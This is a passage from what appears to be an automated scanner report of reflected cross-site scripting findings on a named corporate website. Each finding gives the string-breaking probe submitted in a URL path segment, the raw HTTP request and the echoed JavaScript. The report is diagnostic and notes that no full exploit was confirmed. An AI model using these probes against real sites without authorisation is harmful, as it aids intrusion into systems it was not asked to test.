The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c77e'%3b41f44f67ee5 was submitted in the REST URL parameter 2. This input was echoed as 7c77e';41f44f67ee5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/healthcare7c77e'%3b41f44f67ee5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:34 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/healthcare7c77e';41f44f67ee5/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1019. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955a4'%3b1d935a27c24 was submitted in the REST URL parameter 1. This input was echoed as 955a4';1d935a27c24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions955a4'%3b1d935a27c24/retail/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions955a4';1d935a27c24/retail/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1020. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0786"%3b6a38a284e2 was submitted in the REST URL parameter 1. This input was echoed as c0786";6a38a284e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc0786"%3b6a38a284e2/retail/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40630
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc0786";6a38a284e2/retail/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.1021. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d924f"%3b5e1acf6be88 was submitted in the REST URL parameter 2. This input was echoed as d924f";5e1acf6be88 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/retaild924f"%3b5e1acf6be88/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41844
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/retaild924f";5e1acf6be88/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1022. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac25'%3b317f5ab671 was submitted in the REST URL parameter 2. This input was echoed as 1ac25';317f5ab671 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/retail1ac25'%3b317f5ab671/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41842
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/retail1ac25';317f5ab671/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1023. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af0ae'%3b8c7c1db7e8c was submitted in the REST URL parameter 1. This input was echoed as af0ae';8c7c1db7e8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsaf0ae'%3b8c7c1db7e8c/utility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:09 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsaf0ae';8c7c1db7e8c/utility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1024. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69dc4"%3bbee51fff62d was submitted in the REST URL parameter 1. This input was echoed as 69dc4";bee51fff62d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions69dc4"%3bbee51fff62d/utility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:37 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions69dc4";bee51fff62d/utility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.1025. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf09"%3b69f6ac69368 was submitted in the REST URL parameter 2. This input was echoed as 7cf09";69f6ac69368 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/utility7cf09"%3b69f6ac69368/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/utility7cf09";69f6ac69368/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1026. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ec1'%3b817df04f6f7 was submitted in the REST URL parameter 2. This input was echoed as 60ec1';817df04f6f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/utility60ec1'%3b817df04f6f7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/utility60ec1';817df04f6f7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1027. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4c4'%3b1c9321bb6b was submitted in the REST URL parameter 1. This input was echoed as 2a4c4';1c9321bb6b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions2a4c4'%3b1c9321bb6b/var/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:53 GMT
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions2a4c4';1c9321bb6b/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1028. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eacb4"%3b433fede53f0 was submitted in the REST URL parameter 1. This input was echoed as eacb4";433fede53f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionseacb4"%3b433fede53f0/var/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40626
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionseacb4";433fede53f0/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1029. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe593"%3b5b1995ad0ce was submitted in the REST URL parameter 2. This input was echoed as fe593";5b1995ad0ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/varfe593"%3b5b1995ad0ce/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/varfe593";5b1995ad0ce/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1030. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b42e'%3b80c0201122d was submitted in the REST URL parameter 2. This input was echoed as 9b42e';80c0201122d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/var9b42e'%3b80c0201122d/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:22 GMT
Content-Type: text/html
Content-Length: 41838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/var9b42e';80c0201122d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1031. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

